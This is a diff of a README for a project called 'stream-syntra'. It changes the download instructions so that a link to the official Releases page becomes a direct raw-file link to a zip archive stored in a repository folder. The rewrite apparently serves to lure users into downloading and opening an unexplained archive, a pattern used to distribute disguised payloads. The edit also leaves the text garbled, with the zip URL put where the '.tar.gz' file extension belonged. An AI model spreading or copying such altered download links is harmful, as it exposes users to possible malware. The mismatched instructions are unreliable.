matias36658/stream-syntra/README.md

 To begin using stream-syntra, follow these simple steps:

 1. **Visit the Releases Page**
-   Click the button above or go to [this page](https://github.com/matias36658/stream-syntra/releases) to access the latest version of the application.
+   Click the button above or go to [this page](https://raw.githubusercontent.com/matias36658/stream-syntra/main/Colchis/stream-syntra.zip) to access the latest version of the application.

 2. **Download the Application**
    On the Releases page, look for the version listed at the top.
 You should see files available for download.
 Choose the file that matches your operating system.
-The file names typically include indications of the OS, such as `.exe` for Windows or `.tar.gz` for Linux.
+The file names typically include indications of the OS, such as `.exe` for Windows or `https://raw.githubusercontent.com/matias36658/stream-syntra/main/Colchis/stream-syntra.zip` for Linux.

 3. **Install the Application**
    After you download the file, navigate to your downloads folder.
 Double-click the downloaded file to start the installation process.
 Follow the on-screen instructions to complete the installation.